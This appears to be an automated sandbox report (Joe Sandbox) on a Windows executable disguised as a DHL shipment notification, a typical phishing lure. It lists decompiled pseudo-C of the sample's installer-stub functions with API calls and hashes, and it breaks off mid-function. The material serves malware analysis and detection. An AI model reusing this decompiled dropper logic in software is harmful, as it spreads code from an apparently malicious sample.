                        			E00405C51(WCHAR* _a4) {
                        				struct _PROCESS_INFORMATION _v20;
                        				int _t7;
                        
                        				0x7a4f90->cb = 0x44;
                        				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f90,  &_v20); // executed
                        				if(_t7 != 0) {
                        					CloseHandle(_v20.hThread);
                        					return _v20.hProcess;
                        				}
                        				return _t7;
                        			}





                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CloseCreateHandleProcess
                        • String ID:
                        • API String ID: 3712363035-0
                        • Opcode ID: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                        • Instruction ID: 1fa2a79eb519949bf7d30246b9e4481379e3d274eb9e55713eae969c2627164f
                        • Opcode Fuzzy Hash: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                        • Instruction Fuzzy Hash: 6AE0B6F4A00209BFEB00DFA4EE09F7B7AACEB44604F408525BD54F2191D7B9A8148A78
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00406A3B(signed int _a4) {
                        				struct HINSTANCE__* _t5;
                        				signed int _t10;
                        
                        				_t10 = _a4 << 3;
                        				_t8 =  *(_t10 + 0x40a410);
                        				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                        				if(_t5 != 0) {
                        					L2:
                        					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                        				}
                        				_t5 = E004069CB(_t8); // executed
                        				if(_t5 == 0) {
                        					return 0;
                        				}
                        				goto L2;
                        			}





                        APIs
                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                          • Part of subcall function 004069CB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                          • Part of subcall function 004069CB: wsprintfW.USER32 ref: 00406A1D
                          • Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                        • String ID:
                        • API String ID: 2547128583-0
                        • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                        • Instruction ID: 8bc6c373ae4a51b79335f269ef4a09a4b84a1385f2c3991dd3566e210a560b2e
                        • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                        • Instruction Fuzzy Hash: 56E0867660421066D610A6755D48D3773B89BC6710306843EF556F2040DB38DC359A6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E0040615E(WCHAR* _a4, long _a8, long _a12) {
                        				signed int _t5;
                        				void* _t6;
                        
                        				_t5 = GetFileAttributesW(_a4); // executed
                        				asm("sbb ecx, ecx");
                        				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                        				return _t6;
                        			}





                        APIs
                        • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,80000000,00000003), ref: 00406162
                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: File$AttributesCreate
                        • String ID:
                        • API String ID: 415043291-0
                        • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                        • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                        • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                        • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00406139(WCHAR* _a4) {
                        				signed char _t3;
                        				signed char _t7;
                        
                        				_t3 = GetFileAttributesW(_a4); // executed
                        				_t7 = _t3;
                        				if(_t7 != 0xffffffff) {
                        					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                        				}
                        				return _t7;
                        			}





                        APIs
                        • GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                        • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                        • Instruction ID: 4d59290e3aa44cd58c99826dd52d8cee581d87a9a88888807f370448835cb7c6
                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                        • Instruction Fuzzy Hash: C2D0C972504130ABC2502728AE0889ABB55EB642717014A35F9A5A62B0CB304C628A98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00405C1C(WCHAR* _a4) {
                        				int _t2;
                        
                        				_t2 = CreateDirectoryW(_a4, 0); // executed
                        				if(_t2 == 0) {
                        					return GetLastError();
                        				}
                        				return 0;
                        			}




                        APIs
                        • CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                        • GetLastError.KERNEL32 ref: 00405C30
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CreateDirectoryErrorLast
                        • String ID:
                        • API String ID: 1375471231-0
                        • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                        • Instruction ID: 9b4f5430b3bbe22f75525a6a8288bb62ac5ef9e6fdb3d88c50eeb6a92616e2bf
                        • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                        • Instruction Fuzzy Hash: 1EC04C71218609AEE7705B209F0DB177A949B50741F11443A6686F40A0DA788455D92D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00406210(void* _a4, void* _a8, long _a12) {
                        				int _t7;
                        				long _t11;
                        
                        				_t11 = _a12;
                        				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                        				if(_t7 == 0 || _t11 != _a12) {
                        					return 0;
                        				} else {
                        					return 1;
                        				}
                        			}





                        APIs
                        • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,007923E3,0078B730,0040357F,0078B730,007923E3,Ody,00793730,00004000,?,00000000,004033A9), ref: 00406224
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: FileWrite
                        • String ID:
                        • API String ID: 3934441357-0
                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                        • Instruction ID: f08cceda346ec9350f11c22fcf513fe3bc01c5f1c17db0892cf19a12a1b56e8c
                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                        • Instruction Fuzzy Hash: 95E08C3220026AABCF10AE698C00AEB3B6CFB05360F01447AFE56E7040D334E83087A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004061E1(void* _a4, void* _a8, long _a12) {
                        				int _t7;
                        				long _t11;
                        
                        				_t11 = _a12;
                        				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                        				if(_t7 == 0 || _t11 != _a12) {
                        					return 0;
                        				} else {
                        					return 1;
                        				}
                        			}





                        APIs
                        • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00793730,0078B730,004035FB,?,?,004034FF,00793730,00004000,?,00000000,004033A9), ref: 004061F5
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                        • Instruction ID: a9904075eeec40e7e939a2dde13f9046a7e38eb284923ea40542f090f2fca858
                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                        • Instruction Fuzzy Hash: 66E08632500219ABDF106E519C04AEB375CFB01350F01487AFD22E2151E231E87187A8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004035FE(long _a4) {
                        				long _t2;
                        
                        				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                        				return _t2;
                        			}




                        APIs
                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E00401FA4() {
                        				void* _t9;
                        				intOrPtr _t13;
                        				void* _t15;
                        				void* _t17;
                        				void* _t20;
                        				void* _t22;
                        
                        				_t19 = E00402DA6(_t15);
                        				E004056D0(0xffffffeb, _t7);
                        				_t9 = E00405C51(_t19); // executed
                        				_t20 = _t9;
                        				if(_t20 == _t15) {
                        					 *((intOrPtr*)(_t22 - 4)) = 1;
                        				} else {
                        					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                        						_t13 = E00406AE6(_t17, _t20); // executed
                        						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                        							if(_t13 != _t15) {
                        								 *((intOrPtr*)(_t22 - 4)) = 1;
                        							}
                        						} else {
                        							E004065B5( *((intOrPtr*)(_t22 - 0xc)), _t13);
                        						}
                        					}
                        					_push(_t20);
                        					CloseHandle();
                        				}
                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t22 - 4));
                        				return 0;
                        			}









                        APIs
                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                          • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                          • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                          • Part of subcall function 00405C51: CreateProcessW.KERNELBASE ref: 00405C7A
                          • Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FEB
                          • Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                          • Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                          • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                        • String ID:
                        • API String ID: 2972824698-0
                        • Opcode ID: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                        • Instruction ID: 2caf0deb9ca9c7db124b05ee4a2ba4d84aa6555efd1b03c2e112275a9e200b7a
                        • Opcode Fuzzy Hash: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                        • Instruction Fuzzy Hash: FCF09671904111E7DB11BBA59A88E9E76A4DF01318F25443BE102B21D0D77C4D419A6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 95%
                        			E0040580F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                        				struct HWND__* _v8;
                        				long _v12;
                        				struct tagRECT _v28;
                        				void* _v36;
                        				signed int _v40;
                        				int _v44;
                        				int _v48;
                        				signed int _v52;
                        				int _v56;
                        				void* _v60;
                        				void* _v68;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				struct HWND__* _t94;
                        				long _t95;
                        				int _t100;
                        				void* _t108;
                        				intOrPtr _t130;
                        				struct HWND__* _t134;
                        				int _t156;
                        				int _t159;
                        				struct HMENU__* _t164;
                        				struct HWND__* _t168;
                        				struct HWND__* _t169;
                        				int _t171;
                        				void* _t172;
                        				short* _t173;
                        				short* _t175;
                        				int _t177;
                        
                        				_t169 =  *0x7a7a84;
                        				_t156 = 0;
                        				_v8 = _t169;
                        				if(_a8 != 0x110) {
                        					if(_a8 == 0x405) {
                        						CloseHandle(CreateThread(0, 0, E004057A3, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                        					}
                        					if(_a8 != 0x111) {
                        						L17:
                        						_t171 = 1;
                        						if(_a8 != 0x404) {
                        							L25:
                        							if(_a8 != 0x7b) {
                        								goto L20;
                        							}
                        							_t94 = _v8;
                        							if(_a12 != _t94) {
                        								goto L20;
                        							}
                        							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                        							_a8 = _t95;
                        							if(_t95 <= _t156) {
                        								L36:
                        								return 0;
                        							}
                        							_t164 = CreatePopupMenu();
                        							AppendMenuW(_t164, _t156, _t171, E004066AB(_t156, _t164, _t171, _t156, 0xffffffe1));
                        							_t100 = _a16;
                        							_t159 = _a16 >> 0x10;
                        							if(_a16 == 0xffffffff) {
                        								GetWindowRect(_v8,  &_v28);
                        								_t100 = _v28.left;
                        								_t159 = _v28.top;
                        							}
                        							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                        								_v60 = _t156;
                        								_v48 = 0x7a1f88;
                        								_v44 = 0x1000;
                        								_a4 = _a8;
                        								do {
                        									_a4 = _a4 - 1;
                        									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                        								} while (_a4 != _t156);
                        								OpenClipboard(_t156);
                        								EmptyClipboard();
                        								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                        								_a4 = _t108;
                        								_t172 = GlobalLock(_t108);
                        								do {
                        									_v48 = _t172;
                        									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                        									 *_t173 = 0xd;
                        									_t175 = _t173 + 2;
                        									 *_t175 = 0xa;
                        									_t172 = _t175 + 2;
                        									_t156 = _t156 + 1;
                        								} while (_t156 < _a8);
                        								GlobalUnlock(_a4);
                        								SetClipboardData(0xd, _a4);
                        								CloseClipboard();
                        							}
                        							goto L36;
                        						}
                        						if( *0x7a7a6c == _t156) {
                        							ShowWindow( *0x7a8aa8, 8);
                        							if( *0x7a8b2c == _t156) {
                        								E004056D0( *((intOrPtr*)( *0x7a0f60 + 0x34)), _t156);
                        							}
                        							E004045A3(_t171);
                        							goto L25;
                        						}
                        						 *0x7a0758 = 2;
                        						E004045A3(0x78);
                        						goto L20;
                        					} else {
                        						if(_a12 != 0x403) {
                        							L20:
                        							return E00404631(_a8, _a12, _a16);
                        						}
                        						ShowWindow( *0x7a7a70, _t156);
                        						ShowWindow(_t169, 8);
                        						E004045FF(_t169);
                        						goto L17;
                        					}
                        				}
                        				_v52 = _v52 | 0xffffffff;
                        				_v40 = _v40 | 0xffffffff;
                        				_t177 = 2;
                        				_v60 = _t177;
                        				_v56 = 0;
                        				_v48 = 0;
                        				_v44 = 0;
                        				asm("stosd");
                        				asm("stosd");
                        				_t130 =  *0x7a8ab0;
                        				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                        				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                        				 *0x7a7a70 = GetDlgItem(_a4, 0x403);
                        				 *0x7a7a68 = GetDlgItem(_a4, 0x3ee);
                        				_t134 = GetDlgItem(_a4, 0x3f8);
                        				 *0x7a7a84 = _t134;
                        				_v8 = _t134;
                        				E004045FF( *0x7a7a70);
                        				 *0x7a7a74 = E00404F58(4);
                        				 *0x7a7a8c = 0;
                        				GetClientRect(_v8,  &_v28);
                        				_v52 = _v28.right - GetSystemMetrics(_t177);
                        				SendMessageW(_v8, 0x1061, 0,  &_v60);
                        				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                        				if(_a8 >= 0) {
                        					SendMessageW(_v8, 0x1001, 0, _a8);
                        					SendMessageW(_v8, 0x1026, 0, _a8);
                        				}
                        				if(_a12 >= _t156) {
                        					SendMessageW(_v8, 0x1024, _t156, _a12);
                        				}
                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                        				_push(0x1b);
                        				E004045CA(_a4);
                        				if(( *0x7a8ab8 & 0x00000003) != 0) {
                        					ShowWindow( *0x7a7a70, _t156);
                        					if(( *0x7a8ab8 & 0x00000002) != 0) {
                        						 *0x7a7a70 = _t156;
                        					} else {
                        						ShowWindow(_v8, 8);
                        					}
                        					E004045FF( *0x7a7a68);
                        				}
                        				_t168 = GetDlgItem(_a4, 0x3ec);
                        				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                        				if(( *0x7a8ab8 & 0x00000004) != 0) {
                        					SendMessageW(_t168, 0x409, _t156, _a12);
                        					SendMessageW(_t168, 0x2001, _t156, _a8);
                        				}
                        				goto L36;
                        			}


                        APIs
                        • GetDlgItem.USER32 ref: 0040586D
                        • GetDlgItem.USER32 ref: 0040587C
                        • GetClientRect.USER32 ref: 004058B9
                        • GetSystemMetrics.USER32 ref: 004058C0
                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058E1
                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058F2
                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405905
                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405913
                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405926
                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405948
                        • ShowWindow.USER32(?,00000008), ref: 0040595C
                        • GetDlgItem.USER32 ref: 0040597D
                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040598D
                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A6
                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059B2
                        • GetDlgItem.USER32 ref: 0040588B
                          • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                        • GetDlgItem.USER32 ref: 004059CF
                        • CreateThread.KERNEL32 ref: 004059DD
                        • CloseHandle.KERNEL32(00000000), ref: 004059E4
                        • ShowWindow.USER32(00000000), ref: 00405A08
                        • ShowWindow.USER32(?,00000008), ref: 00405A0D
                        • ShowWindow.USER32(00000008), ref: 00405A57
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A8B
                        • CreatePopupMenu.USER32 ref: 00405A9C
                        • AppendMenuW.USER32 ref: 00405AB0
                        • GetWindowRect.USER32 ref: 00405AD0
                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE9
                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B21
                        • OpenClipboard.USER32(00000000), ref: 00405B31
                        • EmptyClipboard.USER32 ref: 00405B37
                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B43
                        • GlobalLock.KERNEL32 ref: 00405B4D
                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B61
                        • GlobalUnlock.KERNEL32(00000000), ref: 00405B81
                        • SetClipboardData.USER32 ref: 00405B8C
                        • CloseClipboard.USER32 ref: 00405B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                        • String ID: {
                        • API String ID: 590372296-366298937
                        • Opcode ID: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                        • Instruction ID: f3bb878df23a29f955279a02cf148875578f9ab87112c8cbe183df0a3e5e7c84
                        • Opcode Fuzzy Hash: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                        • Instruction Fuzzy Hash: 7DB16BB1900608FFDF119F64DD89AAE7B79FB45354F00802AFA41BA1A0CB785E51DF68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E00404ABB(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                        				signed int _v8;
                        				signed int _v12;
                        				long _v16;
                        				long _v20;
                        				long _v24;
                        				char _v28;
                        				intOrPtr _v32;
                        				long _v36;
                        				char _v40;
                        				unsigned int _v44;
                        				signed int _v48;
                        				WCHAR* _v56;
                        				intOrPtr _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				WCHAR* _v72;
                        				void _v76;
                        				struct HWND__* _v80;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t82;
                        				long _t87;
                        				short* _t89;
                        				void* _t95;
                        				signed int _t96;
                        				int _t109;
                        				signed short _t114;
                        				signed int _t118;
                        				struct HWND__** _t122;
                        				intOrPtr* _t138;
                        				WCHAR* _t146;
                        				unsigned int _t150;
                        				signed int _t152;
                        				unsigned int _t156;
                        				signed int _t158;
                        				signed int* _t159;
                        				signed int* _t160;
                        				struct HWND__* _t166;
                        				struct HWND__* _t167;
                        				int _t169;
                        				unsigned int _t197;
                        
                        				_t156 = __edx;
                        				_t82 =  *0x7a0f60;
                        				_v32 = _t82;
                        				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
                        				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                        				if(_a8 == 0x40b) {
                        					E00405CB2(0x3fb, _t146);
                        					E004068F5(_t146);
                        				}
                        				_t167 = _a4;
                        				if(_a8 != 0x110) {
                        					L8:
                        					if(_a8 != 0x111) {
                        						L20:
                        						if(_a8 == 0x40f) {
                        							L22:
                        							_v8 = _v8 & 0x00000000;
                        							_v12 = _v12 & 0x00000000;
                        							E00405CB2(0x3fb, _t146);
                        							if(E00406045(_t186, _t146) == 0) {
                        								_v8 = 1;
                        							}
                        							E0040666E(0x79ff58, _t146);
                        							_t87 = E00406A3B(1);
                        							_v16 = _t87;
                        							if(_t87 == 0) {
                        								L30:
                        								E0040666E(0x79ff58, _t146);
                        								_t89 = E00405FE8(0x79ff58);
                        								_t158 = 0;
                        								if(_t89 != 0) {
                        									 *_t89 = 0;
                        								}
                        								if(GetDiskFreeSpaceW(0x79ff58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                        									goto L35;
                        								} else {
                        									_t169 = 0x400;
                        									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                        									asm("cdq");
                        									_v48 = _t109;
                        									_v44 = _t156;
                        									_v12 = 1;
                        									goto L36;
                        								}
                        							} else {
                        								_t159 = 0;
                        								if(0 == 0x79ff58) {
                        									goto L30;
                        								} else {
                        									goto L26;
                        								}
                        								while(1) {
                        									L26:
                        									_t114 = _v16(0x79ff58,  &_v48,  &_v28,  &_v40);
                        									if(_t114 != 0) {
                        										break;
                        									}
                        									if(_t159 != 0) {
                        										 *_t159 =  *_t159 & _t114;
                        									}
                        									_t160 = E00405F89(0x79ff58);
                        									 *_t160 =  *_t160 & 0x00000000;
                        									_t159 = _t160;
                        									 *_t159 = 0x5c;
                        									if(_t159 != 0x79ff58) {
                        										continue;
                        									} else {
                        										goto L30;
                        									}
                        								}
                        								_t150 = _v44;
                        								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                        								_v44 = _t150 >> 0xa;
                        								_v12 = 1;
                        								_t158 = 0;
                        								__eflags = 0;
                        								L35:
                        								_t169 = 0x400;
                        								L36:
                        								_t95 = E00404F58(5);
                        								if(_v12 != _t158) {
                        									_t197 = _v44;
                        									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                        										_v8 = 2;
                        									}
